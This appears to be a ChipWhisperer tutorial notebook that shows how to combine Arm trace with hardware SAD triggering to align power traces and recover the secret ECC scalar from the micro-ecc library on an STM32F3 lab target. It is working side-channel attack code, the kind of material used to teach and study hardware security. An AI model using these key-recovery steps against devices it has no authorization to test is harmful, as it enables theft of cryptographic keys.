# Breaking Software ECC with TraceWhisperer *and* SAD

## Background

The [uecc_part1_trace.ipynb](uecc_part1_trace.ipynb) notebook was written to show how to find and exploit side-channel leakage in the [micro-ecc library](https://github.com/newaetech/chipwhisperer/tree/develop/hardware/victims/firmware/crypto/micro-ecc) using Arm trace and [TraceWhisperer](https://github.com/newaetech/tracewhisperer).

Most of what makes that notebook long is dealing with the jitter that's inherent to trace.

While it's not explicitly presented as such, the notebook essentially deals with the jitter by using SAD (Sum of Absolute Differences) to re-align the traces. There, the SADs are computed in software. But Husky can do SAD in hardware (and it's *much* faster than software-based SAD).
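For readers who haven't met SAD before, here is a minimal software sketch of the idea on synthetic data. It is only an illustration: the function name `sad_scores`, the synthetic pattern and the noise level are all made up for this example, and it does not claim to reproduce how part 1 or Husky's hardware computes SAD.

```python
import numpy as np

def sad_scores(wave, ref):
    """Sum of absolute differences between `ref` and every window of `wave`."""
    wave = np.asarray(wave, dtype=float)
    ref = np.asarray(ref, dtype=float)
    # one row per candidate alignment of the reference against the trace
    windows = np.lib.stride_tricks.sliding_window_view(wave, len(ref))
    return np.abs(windows - ref).sum(axis=1)

# synthetic demo (made-up data): hide a known pattern at offset 137 in noise
rng = np.random.default_rng(0)
ref = np.sin(np.linspace(0, 14 * np.pi, 96))
wave = rng.normal(0, 0.05, 1000)
wave[137:137 + 96] += ref

scores = sad_scores(wave, ref)
best_offset = int(np.argmin(scores))   # alignment with the lowest SAD
print(best_offset)
```

The lowest score marks the offset where the trace looks most like the reference; re-aligning jittery segments amounts to shifting each one by its best offset.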

At the time that uecc_part1_trace.ipynb was written, it wasn't possible to combine trace and SAD. But with the addition of sequenced triggers, it is now.

The [uecc_part2_notrace.ipynb](uecc_part2_notrace.ipynb) notebook already showed a successful attack using SAD. So why this notebook? The answer is that combining trace and SAD **simplifies** the attack:

1. **Combining trace and SAD allows us to deal with jitter much more easily than what we had to do in part 1.**
2. **Combining trace and SAD makes SAD much easier to tune than it was in part 2.**

This notebook and the original uecc_part1_trace.ipynb are similar and independent of one another, but uecc_part1_trace.ipynb has more explanations on the attack and the setting up of trace. It also explores leakage at various points, whereas this notebook focuses on just one area of leakage.

Finally, while uecc_part1_trace.ipynb can be run with ChipWhisperer-Pro and PhyWhisperer (running TraceWhisperer FW), this notebook **requires** CW-Husky (for its sequenced trigger capability).

## Supported Hardware

This tutorial requires CW-Husky; it is written for the STM32F3 target, but it could be ported to other Arm targets, as long as they contain an ETM module (which our SAM4S target, sadly, does not).

In [None]:
PLATFORM = 'CW308_STM32F3'
TRACE_INTERFACE = 'swo'
SCOPETYPE = 'OPENADC'

# not supported by this notebook, but can be made to work:
#PLATFORM = 'CW308_K82F'
#TRACE_INTERFACE = 'parallel'

In [None]:
import chipwhisperer as cw

In [None]:
# platform setup:
scope = cw.scope()
%run "../../Setup_Scripts/Setup_Generic.ipynb"
scope.trace.target = target
trace = scope.trace
scope.clock.clkgen_freq = 10e6
scope.clock.clkgen_src = 'system'
scope.clock.adc_mul = 1
scope.gain.setGain(19)
target.baud = 38400 * 10 / 7.37

In [None]:
trace.enabled = True
trace.clock.clkgen_enabled = True

In [None]:
scope.adc.samples = 6000000
scope.adc.stream_mode = True

### Program STM32 target:

**Warning**: if you make any changes to the target firmware (including compiler version and switches), there is a chance that the attack parameters used in this notebook won't work for you anymore. So, for your first run-through, stick with the provided binary.

But making changes to the target firmware is a great way to learn how to use TraceWhisperer, so once you've had success with the provided binary, do go ahead and try some changes! In fact, TraceWhisperer should make it easier to port the attack.

In [None]:
#%%bash -s "$PLATFORM"
#cd ../../../firmware/mcu/simpleserial-ecc
#make PLATFORM=$1 CRYPTO_TARGET=MICROECC

In [None]:
fw_path = '../../../firmware/mcu/simpleserial-ecc/simpleserial-ecc-{}.hex'.format(PLATFORM)

In [None]:
if (PLATFORM == 'CW308_STM32F3') or (PLATFORM == 'CWLITEARM'):
    prog = cw.programmers.STM32FProgrammer
    cw.program_target(scope, prog, fw_path)

In [None]:
reset_target(scope)

In [None]:
# target info and buildtimes:
print(trace.phywhisperer_name())
print(trace.get_fw_buildtime())
print(scope.fpga_buildtime)

### Set SWO operation mode:

Arm processors which support JTAG and SWD come out of reset in JTAG mode. In order to get trace data out of the SWO pin, we need to switch it over to SWD mode.

The `jtag_to_swd()` call below runs a special sequence on the TMS and TCK pins to do this switchover. However, different processors may have *additional* requirements to enable the SWO pin. The `simpleserial-trace` firmware handles this for our STM32 target.

Another sure-fire way to get a target into SWD mode is to use an external debugger. In that case, do not call `jtag_to_swd()`, as this could result in contention on the TMS/TCK pins, but do call `trace.set_trace_mode()`, because Husky still needs to know that the target is in SWO mode.

This table shows the jumper cables that you need to connect between Husky and the target:

| ChipWhisperer | Target     |
|     :-:       |    :-:     |
|      D0       |    TMS     |
|      D1       |    TCK     |
|      D2       |    TDO     |


In [None]:
if TRACE_INTERFACE == 'swo':
    trace.clock.fe_clock_src = 'target_clock'
    assert trace.clock.fe_clock_alive, "Hmm, the clock you chose doesn't seem to be active."
    trace.trace_mode = 'SWO'
    trace.jtag_to_swd() # switch target into SWO mode

    # Now the complicated bit:
    acpr = 0
    trigger_freq_mul = 8
    trace.clock.swo_clock_freq = scope.clock.clkgen_freq * trigger_freq_mul
    trace.target_registers.TPI_ACPR = acpr
    trace.swo_div = trigger_freq_mul * (acpr + 1)
    assert trace.clock.swo_clock_locked, "Trigger/UART clock not locked"
    assert scope.userio.status & 0x4, "SWO line not high"

else:
    print("Not supported in this notebook. See TraceWhisperer.ipynb to see how to set this up.")

In [None]:
import time

scope.clock.reset_adc()
time.sleep(0.2)
assert (scope.clock.adc_locked), "ADC failed to lock"

#### Check that the target is alive:
If `get_fw_buildtime()` produces no output, the target may have become unresponsive after the above changes; it may simply require a reset.

In [None]:
reset_target(scope)
print(trace.get_fw_buildtime())

### Trigger trace capture from target FW:
(refer to [uecc_part1_trace.ipynb](uecc_part1_trace.ipynb) for explanations on what this does)

In [None]:
scope.trigger.module = 'basic'
scope.trigger.triggers = 'tio4'
trace.capture.trigger_source = 'firmware trigger'
trace.capture.raw = False

# match on any PC match (isync) trace packet:
trace.set_pattern_match(0, [3, 8, 32, 0, 0, 0, 0, 0], [255, 255, 255, 0, 0, 0, 0, 0])

# enable matching rule:
trace.capture.rules_enabled = [0]

trace.capture.mode = 'while_trig'

TRACES = 'HARDWARE'
%run "ECC_capture.ipynb"

trace.target_registers.DWT_CTRL = '40000021'

One thing we do differently from uecc_part1_trace.ipynb is that we'll only look at one PC address match: the start of the `XYcZ_add()` function.

In [None]:
trace.set_isync_matches(addr0=0, addr1=0x080011bc, match=1)

In [None]:
import random
def new_point():
    tries = 100
    for i in range(tries):
        x = random.getrandbits(256)
        y = curve.y_recover(x)
        if y:
            return (x,y)
    raise ValueError('Failed to generate a random point')

We begin the attack by collecting a single trace of the full target operation. We'll use a $k$ with alternating ones/zeros to make things easier for us later:

In [None]:
kr = 0xaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
k = input_k(kr)
Px, Py = new_point()

trace.arm_trace()
ptrace = capture_ecc_trace(k, Px, Py)
while trace.fifo_empty(): pass
raw = trace.read_capture_data()
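As a quick sanity check on the choice of scalar above, the snippet below prints nothing fancy; it just confirms that `0xaa...aa` really is a strict alternation of ones and zeros across all 256 bits. How bit positions map onto loop iterations in the target is not modelled here.

```python
kr = 0xaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

# each hex digit 'a' is binary 1010, so consecutive bits always differ
bits = format(kr, '0256b')
alternating = all(bits[i] != bits[i + 1] for i in range(len(bits) - 1))
print(len(bits), bits[:16], alternating)
```

Because neighbouring bits always differ, loop iterations can later be sorted into "ones" and "zeros" purely by whether their index is odd or even.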

Then we get the trace match event timestamps; there should be 255, because that's the number of iterations in the target's main loop:

In [None]:
times_p2 = trace.get_rule_match_times(raw, rawtimes=False, verbose=False)
assert len(times_p2) == 255

Let's overlay plot all the power trace segments using the debug trace timestamps.

If we're lucky, we may see nice alignment for part of the capture, but this depends on how jittery the target's trace module is feeling at the moment(!):

In [None]:
start = -200
samples = 200
from bokeh.palettes import inferno
from bokeh.plotting import figure, show
from bokeh.resources import INLINE
from bokeh.io import output_notebook
from bokeh.models import Span, Legend, LegendItem
import itertools
output_notebook(INLINE)
B = figure(width=1800)
colors = itertools.cycle(inferno(255))
for i in range(255):
    B.line(list(range(samples)), ptrace.wave[times_p2[i][0]+start:times_p2[i][0]+start+samples], color=next(colors))
show(B)

In case of bad jitter, here's just one trace segment.

In [None]:
samples = 200
start = -200
s = figure(width=2000)
i1 = 127
s.line(list(range(samples)), ptrace.wave[times_p2[i1][0]+start:times_p2[i1][0]+start+samples], line_color='blue')
#s.line(range(samples), ptrace.wave[times_p2[i2][0]+start:times_p2[i2][0]+start+samples], line_color='red')
show(s)

When the trace jitter doesn't act up, what we find is alignment across the power trace segments from sample ~40 to ~170; YMMV due to jitter, but what you're looking for is a series of 7 equidistant narrow peaks:
![7_narrow_peaks](img/uecc_7narrow_peaks.png)


If you spend some time studying the power trace, you'll see that this pattern is particularly distinct, which makes it a good candidate for a SAD reference (spoiler: it is).

But there's one small problem: notice how we have indexed into the full power trace 200 samples *before* the trace trigger (i.e. see the `start = -200` above)?

Remember our goal is to sequence two triggers: first the trace trigger brings us in the vicinity of the leakage we wish to exploit (+/- some jitter), then a SAD trigger shortly after the trace trigger eliminates the jitter. The key word here is **after**: we can't use the 7 narrow peaks for SAD if they come *before* the trace trigger!

What to do? Well, with trace we can trigger on *any* PC address; what if we trace trigger a little bit earlier?

Recall that here we were triggering on the start of the `XYcZ_add()` function. Examining the source disassembly, we can move the PC trigger to the previous function call, which is the call to `uECC_vli_set()` that's done at the end of `XYcZ_addC()`. Let's see what happens:

In [None]:
trace.set_isync_matches(addr0=0, addr1=0x08000e12, match=1)

In [None]:
trace.arm_trace()
ptrace = capture_ecc_trace(k, Px, Py)
while trace.fifo_empty(): pass
raw = trace.read_capture_data()

In [None]:
# convert debug traces into timestamps:
times_p2 = trace.get_rule_match_times(raw, rawtimes=False, verbose=False)
assert len(times_p2) == 256

We get 256 PC match events -- that's good.

Overlaying all the trace segments, there seems to be more jitter, and our 7 narrow peaks are harder to locate:

In [None]:
start = 0
samples = 1000
B = figure(width=1800)
colors = itertools.cycle(inferno(255))
for i in range(255):
    B.line(list(range(samples)), ptrace.wave[times_p2[i][0]+start:times_p2[i][0]+start+samples], color=next(colors))
show(B)

But if we plot just a few (or, in the worst case, just one) trace segments, then we should easily locate the 7 peaks near index 500:

In [None]:
samples = 1000
start = 0
s = figure(width=2000)
# unless you're lucky you'll likely need to try different indices until you get synchronized traces:
i1 = 127
i2 = 5
i3 = 200
s.line(list(range(samples)), ptrace.wave[times_p2[i1][0]+start:times_p2[i1][0]+start+samples], line_color='blue')
#s.line(list(range(samples)), ptrace.wave[times_p2[i2][0]+start:times_p2[i2][0]+start+samples], line_color='red')
s.line(list(range(samples)), ptrace.wave[times_p2[i3][0]+start:times_p2[i3][0]+start+samples], line_color='green')
show(s)

Let's establish our SAD reference. Zoom in to gather good indices.

We'll use a 96-sample SAD reference.

*(Side note: why 96? It's historical... When this notebook was originally developed, we were limited to setting the SAD reference to 192 or 96 samples. Now Husky SAD is much more flexible and we can set the reference to any number of samples (up to `scope.SAD.sad_reference_length`), but we'll stay with the original 96 samples.)*


Because of the trace jitter, you may need to adjust these numbers. Typically, either 510 or 570 is a good stop point. **Make sure to not go more than 50 samples beyond the end of the 7 peaks.**

In [None]:
segment = i1
#stop = 510
stop = 570
start = stop-96

ref_trace = ptrace.wave[times_p2[segment][0]+start:times_p2[segment][0]+start+scope.SAD.sad_reference_length*2]

In [None]:
s = figure(width=2000)
s.line(list(range(96)), ref_trace[:96])
show(s)

**If you don't see the 7 peaks, try the "other" value for `stop` (510 or 570).**

Recall that our eventual goal is to do a sequenced trace+SAD capture, but let's build that one step at a time.

First, let's do a SAD-triggered capture only (without trace). This is helpful for establishing a good SAD threshold value.

Instead of capturing the full target operation, we'll use Husky's segmented capture feature to capture `scope.adc.samples` samples every time the SAD trigger fires (which we expect it to do 255 times, ideally).

In [None]:
scope.trigger.module = 'SAD'
scope.SAD.trigger_sample = 96
scope.SAD.reference = ref_trace

We have to explicitly tell the SAD module that it can fire multiple times; additionally, we set `scope.SAD.always_armed` so that it keeps firing even after the capture is done.

Without this, the SAD module would stop firing after the capture is complete (e.g. after it's fired `scope.adc.segments` times). This way, we can find out whether it's firing too few times or too many times (instead of inferring it from the quality of the traces, or whether the attack works or not).

We'll also set some threshold values that we'll fine-tune later:

In [None]:
scope.SAD.multiple_triggers = True
scope.SAD.always_armed = True
scope.SAD.threshold = 10
scope.SAD.interval_threshold = 10

In [None]:
scope.adc.stream_mode = False
scope.adc.segment_cycle_counter_en = False
scope.adc.segments = 255

Again we'll use `SADExplorer` to help tune the thresholds:

In [None]:
explorer = cw.SADExplorer(scope, target, ref_trace, 0, max_segments=255, capture_function=lambda: capture_ecc_trace(k, Px, Py))

Unlike in uecc_part2_notrace.ipynb, where we aimed to tune the thresholds to get exactly 255 matches, here it's fine to get many more matches. As long as you get fewer than 4000 matches, you should be good.

Make sure that the 7 peaks of our SAD reference are clear. *(hint: you'll likely need to reduce the SAD thresholds; "trigger too soon" errors are ok and expected here)*

**This is the power of sequencing triggers!**

Why? Because the next step is to sequentially trigger from SAD *within a small time window* after the trace trigger.

If you don't get between 255 and 4000 triggers, adjust the thresholds until you do; if that doesn't work, make sure your SAD reference is appropriate.

In [None]:
if 255 <= scope.SAD.num_triggers_seen < 4000:
    print('Looks good! Got %d triggers. ✅' % scope.SAD.num_triggers_seen)
else:
    print('❌ Got %d triggers; try again.' % scope.SAD.num_triggers_seen)
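To build some intuition for why the trigger count swings with the threshold, here is a toy software model on synthetic data. Everything in it is an assumption made for illustration: `count_sad_triggers`, the hold-off of one reference length after each match, the planted pattern and the threshold values. Husky's hardware SAD and its `threshold`/`interval_threshold` settings work on their own scale, so none of these numbers transfer to the scope.

```python
import numpy as np

def count_sad_triggers(wave, ref, threshold):
    """Count windows of `wave` whose SAD against `ref` is <= `threshold`.

    After each match, skip ahead by len(ref) so one occurrence counts once.
    """
    wave = np.asarray(wave, dtype=float)
    ref = np.asarray(ref, dtype=float)
    windows = np.lib.stride_tricks.sliding_window_view(wave, len(ref))
    scores = np.abs(windows - ref).sum(axis=1)
    count, i = 0, 0
    while i < len(scores):
        if scores[i] <= threshold:
            count += 1
            i += len(ref)      # hold-off: don't re-trigger inside this match
        else:
            i += 1
    return count

# made-up trace: noise with four planted copies of the reference pattern
rng = np.random.default_rng(1)
ref = np.sin(np.linspace(0, 14 * np.pi, 96))
wave = rng.normal(0, 0.05, 5000)
for offset in (500, 1500, 2500, 3500):
    wave[offset:offset + 96] += ref

for threshold in (1, 10, 70):
    print(threshold, count_sad_triggers(wave, ref, threshold))
```

A threshold that is too strict misses the planted occurrences, while one that is too loose also fires on plain noise; the useful range sits in between.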

### Next: let's do a trace-triggered segmented capture only, without SAD.

At the start of this notebook, we used trace, but the scope capture itself was triggered by IO4.

Now we set up the trace module to emit the capture trigger. This will be the first trigger of our trigger sequence, so let's make sure we can get it to fire as expected.

In [None]:
scope.trigger.module = 'trace'
trace.capture.trigger_source = 0
trace.capture.mode = 'count_cycles'
trace.capture.count = int(7e6)
trace.capture.max_triggers = 256

In [None]:
trace.arm_trace()
ptrace = capture_ecc_trace(k, Px, Py)

In [None]:
while trace.fifo_empty(): pass
raw = trace.read_capture_data()

In [None]:
# convert debug traces into timestamps:
times_p2 = trace.get_rule_match_times(raw, rawtimes=False, verbose=False)
assert len(times_p2) == 256

You can plot the segments out of curiosity, but they won't align nicely due to the jitter:

In [None]:
samples = scope.adc.samples
B = figure(width=1800)
colors = itertools.cycle(inferno(255))
for i in range(255):
    B.line(list(range(samples)), ptrace.wave[i*samples:(i+1)*samples], color=next(colors))
show(B)

## Finally, we are ready to set up the trigger sequencer:

Now we add the second trigger to our trigger sequence, the SAD trigger. All we need to do is:

In [None]:
scope.trigger.sequencer_enabled = True
scope.trigger.module[0] = 'trace'
scope.trigger.module[1] = 'SAD'

A powerful feature of sequenced triggering is that we can optionally specify the allowed time delta between the first and second triggers.

Minimum and maximum deltas can be specified; if the second trigger occurs outside of this time window, then it is ignored.
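The windowing rule can be sketched in a few lines of plain Python. This is a toy model only: `sequence_triggers`, the inclusive window bounds and the example timestamps are assumptions for illustration, not a description of how Husky's sequencer is implemented.

```python
def sequence_triggers(first_times, second_times, window_start, window_end):
    """Toy model of a two-stage trigger sequence.

    For each first trigger at time t0, accept the earliest second trigger
    at time t with window_start <= t - t0 <= window_end; ignore the rest.
    `second_times` is assumed to be sorted in increasing order.
    """
    accepted = []
    for t0 in first_times:
        for t in second_times:
            if window_start <= t - t0 <= window_end:
                accepted.append(t)
                break
    return accepted

# made-up timestamps, in clock cycles
first = [1000, 22000, 43000]
second = [200, 1650, 9000, 22640, 30000, 43660, 50000]
accepted = sequence_triggers(first, second, window_start=500, window_end=800)
print(accepted)
```

Second triggers that fall outside every window are simply dropped, which is why the second trigger can be far less selective than it would need to be on its own.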

Our reference trace was taken to end 510 or 570 samples after the trace trigger, depending on which `stop` value you chose (if you used a different value, adjust the window accordingly).

In the case of the SAD trigger, it's important to know that the SAD trigger actually fires `scope.SAD.latency` cycles *after* the end of the SAD pattern (`scope.SAD.latency` can vary as the design and capture hardware evolves).

Additionally, if you ran uecc_part1_trace.ipynb then you know that trace jitter is on the order of +/-70 clock cycles.

Taking all this into account, we can expect the SAD trigger to fire in the range of `510 + scope.SAD.trigger_sample + scope.SAD.latency +/- 70` cycles.

Finally, while the SAD trigger fires at the end of the SAD pattern match, it must already be enabled when the pattern starts, so the start of the window should be shifted back by `scope.SAD.sad_reference_length`, with a bit more margin added on either side.

In [None]:
margin = 100
scope.trigger.window_start = 510 + scope.SAD.latency - 70 - margin
scope.trigger.window_end = 570 + scope.SAD.latency + scope.SAD.trigger_sample + 70 + margin
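To see what kind of numbers this produces, the helper below repeats the same arithmetic as the cell above without needing a scope attached. The function name `sad_trigger_window` is made up for this example, and `latency=10` is only a placeholder; read the real value from `scope.SAD.latency` on your hardware.

```python
def sad_trigger_window(stop_min, stop_max, latency, trigger_sample, jitter, margin):
    """Mirror the window_start / window_end arithmetic used in the cell above."""
    window_start = stop_min + latency - jitter - margin
    window_end = stop_max + latency + trigger_sample + jitter + margin
    return window_start, window_end

# latency=10 is a placeholder value, not a measured one
start, end = sad_trigger_window(stop_min=510, stop_max=570, latency=10,
                                trigger_sample=96, jitter=70, margin=100)
print(start, end)
```

If you picked a different `stop` for your SAD reference, substituting it for `stop_min` and `stop_max` shows how far the window moves.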

If you have a logic analyzer it can be helpful for tuning the trigger sequencer parameters.

For this notebook, this should not be necessary at all, since there is lots of guidance for setting the proper triggering parameters. However, it can come in very handy when you're building a trigger sequence from scratch, so it's good to know that this is available.

In [None]:
scope.userio.mode = 'swo_trace_plus_debug'
scope.userio.fpga_mode = 14

Husky's USERIO port pulls double duty here: pins D0, D1, and D2 are connected to the target (to obtain the debug trace data); connect the remaining pins (D3-D7) to your logic analyzer.

Printing the `scope.userio` object tells you the definition of each USERIO pin:

In [None]:
scope.userio

- `D3/trigger[0]` is the first trigger in the trigger sequence (trace)
- `D4/trigger[1]` is the second trigger (SAD)
- `D5/trigger 0 window`: when this is high, the trigger sequencer is waiting for the first trigger; it goes low when the trigger is received
- `D6/trigger 1 window`: when this is high, the trigger sequencer is waiting for the second trigger; it goes low when the trigger is received, or its expected window expires
- `D7/too late` pulses if the second trigger is not received by the end of its window

***Important note**: if you connect a logic analyzer to the USERIO D3-D7 pins, be sure to connect several ground lines between the logic analyzer and Husky. The internal trigger signals are narrow single-cycle pulses, and less-than-ideal connections can actually mess up their proper functioning inside the FPGA (i.e. this can cause the capture that follows to fail). If you suspect this is a problem (i.e. you can't get the sequence-triggered capture to work), try disconnecting D3-D7, and set `scope.userio.mode` back to `'trace'`.*

Now we're ready to capture. Some tuning of `scope.SAD.threshold` may still be necessary here; if anything, you **may** find that you need to set the threshold a fair bit higher.

This is ok because `scope.trigger.window_start` and `scope.trigger.window_end` prevent the SAD trigger from firing when it's not supposed to.

Note that we no longer need to capture trace data; we're only using trace to generate the first trigger in our sequence:

In [None]:
trace.capture.mode = 'off'

We can also turn this off, since SAD will only be allowed to fire in our specified window anyhow:

In [None]:
scope.SAD.always_armed = False

The moment of truth: let's see if our sequenced trigger capture works:

In [None]:
# cross your fingers...
trace.arm_trace()
seqtrace = capture_ecc_trace(k, Px, Py)
assert scope.SAD.num_triggers_seen == 255, 'Got %d SAD triggers' % scope.SAD.num_triggers_seen

In [None]:
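# convert debug traces into timestamps
# (trace capture is now off, so `raw` still holds the data from the earlier trace-triggered capture):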
times_p2 = trace.get_rule_match_times(raw, rawtimes=False, verbose=False)
assert len(times_p2) == 256

It shouldn't be possible to get too many triggers (because now the SAD can only trigger after the trace trigger), but you may get too few; if so, tweak `scope.SAD.threshold` and/or `scope.SAD.interval_threshold` until you get the right number.

Once you do get the right number, let's check whether the time deltas between successive triggers are within the accepted range:

In [None]:
ttimes = scope.trigger.get_trigger_times()
assert len(ttimes) == 254
assert 20000 < min(ttimes) < 23000
assert 20000 < max(ttimes) < 23000

In [None]:
len(ttimes), min(ttimes), max(ttimes), np.average(ttimes)

If you're getting out-of-range trigger times, it's likely that you've swung too far on `scope.SAD.threshold` and/or `scope.SAD.interval_threshold`; reduce until you get 255 SAD triggers that are all in the expected time range.

If we now overlay the power trace segments, we should find perfect alignment. Compare this with the jittery trace-triggered power trace segments!

**If you don't have perfect alignment, it's likely that your SAD threshold is too high: it's very important to fix this before proceeding any further.**

In [None]:
samples = scope.adc.samples
B = figure(width=1800)
colors = itertools.cycle(inferno(255))
for i in range(255):
    B.line(list(range(samples)), seqtrace.wave[i*samples:(i+1)*samples], color=next(colors))
show(B)

All the hard work is done now!

We have rock-steady, jitter-free captures around where we expect to find leakage, so all that's left to do is find the leakage and exploit it.

As in uecc_part1_trace.ipynb, we'll capture a few traces using a constant $k$, calculate the average trace segment for $k$ bits that are 0 and for $k$ bits that are 1, and hope to find a consistent difference.

While we've tuned our SAD parameters for a single capture, power traces are noisy so it's possible that some captures don't work out. But we can detect this and discard bad traces, instead of letting them pollute our trace set.

In [None]:
trace.capture.use_husky_arm = True # this saves us from having to arm the scope *and* the trace module separately

We'll increase our `presamples` to ensure we grab the area where leakage is present:

In [None]:
scope.adc.presamples = scope.SAD.trigger_sample + scope.SAD.latency + 100
scope.adc.samples = scope.adc.presamples + 9 + (3 - (scope.adc.presamples%3)) # must be a multiple of 3
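The padding expression in the cell above is easy to check in isolation. In the sketch below, `samples_for` is a made-up helper that repeats the same formula, and the `presamples` values are hypothetical stand-ins for whatever your `scope.SAD.latency` yields.

```python
def samples_for(presamples, extra=9):
    """Same formula as the cell above: presamples + extra, padded up by 1 to 3."""
    return presamples + extra + (3 - (presamples % 3))

for presamples in (204, 205, 206):   # hypothetical values
    samples = samples_for(presamples)
    print(presamples, samples, samples % 3)
```

Note that the result is a multiple of 3 only because `extra` itself is one, and that a `presamples` value that is already a multiple of 3 still gets 3 more samples added.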

In [None]:
traces = 30

from tqdm.notebook import tnrange

ptraces = []

# acquire power and debug traces:
for t in tnrange(traces, desc='Capturing traces'):
    Px, Py = new_point()
    #trace.arm_trace() # don't actually need trace data; just its trigger!
    ptrace = capture_ecc_trace(k, Px, Py)
    # make sure it's a "good" trace:
    if scope.SAD.num_triggers_seen != 255:
        print('Got %d SAD triggers; skipping this one.' % scope.SAD.num_triggers_seen)
        continue
    ttimes = scope.trigger.get_trigger_times()
    if not ((20000 < min(ttimes) < 23000) and (20000 < max(ttimes) < 23000)):
        print('ttimes out of spec: min=%d, max=%d; skipping this one.' % (min(ttimes), max(ttimes)))
        continue
    ptraces.append(ptrace)


A few failed captures are ok, but if you get a lot, it's best to fix that by tweaking the SAD thresholds before proceeding.

In [None]:
assert len(ptraces) > 25, 'got only %d traces ' % len(ptraces)

## Compute the average ones and zeros:

We now take the same approach from part 1 and part 2 to find the leakage and carry out the attack:

In [None]:
samples = scope.adc.samples

avg_trace = np.zeros(samples)

for t in ptraces:
    for i in range(1,255):
        avg_trace += t.wave[i*samples:(i+1)*samples]

avg_trace /= (254*len(ptraces))  # the loop above sums 254 segments (1..254) per trace

In [None]:
avg_ones = np.zeros(samples)
avg_zeros = np.zeros(samples)

for t in ptraces:
    for i in range(254):
        if i%2:
            avg_ones += t.wave[i*samples:(i+1)*samples]
        else:
            avg_zeros += t.wave[i*samples:(i+1)*samples]

avg_ones /= (127*len(ptraces))
avg_zeros /= (127*len(ptraces))
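The same difference-of-means idea can be tried on synthetic data, with no hardware involved. In this sketch the segment size, the leaking sample index and the leak amplitude are all invented, and a single made-up trace stands in for the whole `ptraces` list; only the odd/even split mirrors the cell above.

```python
import numpy as np

rng = np.random.default_rng(2)
samples, segments = 50, 254            # hypothetical sizes
leak_at = 20                           # hypothetical leaking sample index

# one long synthetic wave made of back-to-back segments
wave = rng.normal(0, 1.0, segments * samples)
for i in range(segments):
    if i % 2:                          # odd segments play the role of "ones"
        wave[i * samples + leak_at] += 5.0

seg = wave.reshape(segments, samples)  # one row per segment
avg_ones = seg[1::2].mean(axis=0)
avg_zeros = seg[0::2].mean(axis=0)
diff = avg_ones - avg_zeros
print(int(np.argmax(np.abs(diff))))
```

Reshaping the wave into one row per segment turns the per-segment loops into two slices, and the leaking sample stands out as the largest entry of `diff`.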

In [None]:
s = figure(width=2000)

xrange = list(range(len(avg_trace)))
#s.line(xrange, avg_trace-50, line_color="black")
s.line(xrange, avg_ones-50, line_color="red")
s.line(xrange, avg_zeros-50, line_color="blue")
s.line(xrange, (avg_ones - avg_zeros)*100, line_color="orange")

show(s)

The figure below shows the leakage that you should find: the tall positive peak and less tall negative peak, about 40 samples (+/- jitter) before the series of 7 narrow peaks.

If you don't see this, it may be that you need to increase `scope.adc.presamples`. (This could happen due to the trace jitter.)

![poi11](img/uecc_seqtrig_leakage.png)


As in uecc_part1_trace.ipynb, we extract those peaks to form our list of "points of interest":

In [None]:
# if using a different target, adjust as needed:
START=0
STOP=300
PTHRESH = 50/100
NTHRESH = 30/100

In [None]:
poi = list(np.where((avg_ones[START:STOP] - avg_zeros[START:STOP]) > PTHRESH)[0] + START)
poi.extend(list(-(np.where((avg_ones[START:STOP] - avg_zeros[START:STOP]) < -NTHRESH)[0] + START)))
print(poi)
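The signed-index convention used for `poi` may be easier to follow on a tiny made-up example. The helper name `find_poi` and the peak positions below are hypothetical; the thresholds play the same role as `PTHRESH` and `NTHRESH`.

```python
import numpy as np

def find_poi(diff, pthresh, nthresh, start=0, stop=None):
    """Return signed indices: +i for positive peaks, -i for negative peaks."""
    window = np.asarray(diff)[start:stop]
    pos = np.where(window > pthresh)[0] + start
    neg = np.where(window < -nthresh)[0] + start
    return [int(i) for i in pos] + [-int(i) for i in neg]

diff = np.zeros(300)
diff[[100, 101, 102]] = 0.8      # made-up positive peak
diff[[140, 141]] = -0.4          # made-up negative peak
poi_demo = find_poi(diff, pthresh=0.5, nthresh=0.3)
print(poi_demo)
```

One caveat of encoding the sign in the index: sample 0 cannot be marked as negative, since `-0 == 0`, so a negative peak at the very first sample would be treated as positive.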

In [None]:
assert 5 < len(poi) < 10, "hmm poi doesn't look quite right, adjust your settings and try again"

In [None]:
def calc_sumdata(poi, ptraces, trim=None):
    if trim:
        samples = trim
    else:
        samples = scope.adc.samples
    sumdata = np.zeros(255)
    for i in range(255):
        for t in ptraces:
            for p in poi:
                sample = t.wave[i*samples+abs(p)]
                if p >= 0:
                    sumdata[i] += sample
                else:
                    sumdata[i] -= sample
    return sumdata/len(ptraces)


And now we find whether we can recognize $kr$:

In [None]:
sd = calc_sumdata(poi, ptraces)

s = figure(width=2000)

xrange = list(range(len(sd)))
s.line(xrange, sd, line_color="red", line_width=2)

show(s)

You should get something that looks like this:

![poi11](img/uecc_0xaaaa.png)

## Now we can **attack!**

We use a random $k$ and see whether we can correctly guess this $k$ from the power trace, using our `poi`.

In [None]:
k = random_k()
kr = regularized_k(k)
hex(k), hex(kr)

In [None]:
traces = 30

from tqdm.notebook import tnrange
ptraces = []
# acquire power and debug traces:
for t in tnrange(traces, desc='Capturing traces'):
    Px, Py = new_point()
    #trace.arm_trace() # don't actually need trace data; just its trigger!
    ptrace = capture_ecc_trace(k, Px, Py)
    # make sure it's a "good" trace:
    if scope.SAD.num_triggers_seen != 255:
        print('Got %d SAD triggers; skipping this one.' % scope.SAD.num_triggers_seen)
        continue
    ttimes = scope.trigger.get_trigger_times()
    if not ((20000 < min(ttimes) < 23000) and (20000 < max(ttimes) < 23000)):
        print('ttimes out of spec: min=%d, max=%d; skipping this one.' % (min(ttimes), max(ttimes)))
        continue
    ptraces.append(ptrace)

In [None]:
assert len(ptraces) > 25, 'Need more traces! (got %d)' % len(ptraces)

In [None]:
sd = calc_sumdata(poi, ptraces)

s = figure(width=2000)

xrange = list(range(len(sd)))
s.line(xrange, sd, line_color="red", line_width=2)
show(s)

You should get a fairly well-defined train of high and low values, without any points that are too close to the middle.
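If you'd like a number rather than an eyeball judgement, one possible check is sketched below. The metric `decision_margin` is an assumption of this example, not something the notebook or ChipWhisperer defines, and the input arrays are made up.

```python
import numpy as np

def decision_margin(sd):
    """Smallest distance of any point from the mean, relative to the largest.

    Values near 1 mean every point is far from the middle; values near 0
    mean at least one point is ambiguous. Assumes `sd` is not constant.
    """
    sd = np.asarray(sd, dtype=float)
    dist = np.abs(sd - sd.mean())
    return dist.min() / dist.max()

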